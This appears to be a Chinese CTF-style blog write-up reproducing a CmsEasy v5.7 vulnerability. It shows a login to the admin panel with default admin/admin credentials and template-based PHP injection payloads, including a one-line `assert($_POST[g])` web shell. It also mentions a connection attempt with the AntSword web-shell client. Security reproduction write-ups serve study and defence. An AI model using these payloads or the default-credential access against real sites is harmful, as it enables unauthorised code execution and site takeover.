【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
aaaameliaaa7 分钟前
计算斐波那契数(递归、迭代)(1,1,2,3,5.....)
c语言·开发语言·笔记·算法·排序算法
Rocket-Luo12 分钟前
谈谈企业中的网络安全
网络·安全·web安全
小c君tt1 小时前
linux学习笔记1
linux·笔记·学习
技术不好的崎鸣同学1 小时前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
ysu_03142 小时前
高数期末复习笔记
笔记
疯狂打码的少年2 小时前
【操作系统】段式存储管理与段页式存储管理
笔记
江畔柳前堤2 小时前
第16章:docker企业级实战综合项目
运维·git·安全·docker·容器·eureka
Bruce_Liuxiaowei3 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
星幻元宇VR3 小时前
公共安全主题展厅设备【防洪防汛安全科普系统】
科技·学习·安全
半导体守望者4 小时前
MKS C系列MFC CMA10 CMA50快速紧凑型手侧与PC联网教程软件驱动USB
经验分享·笔记·功能测试·自动化·制造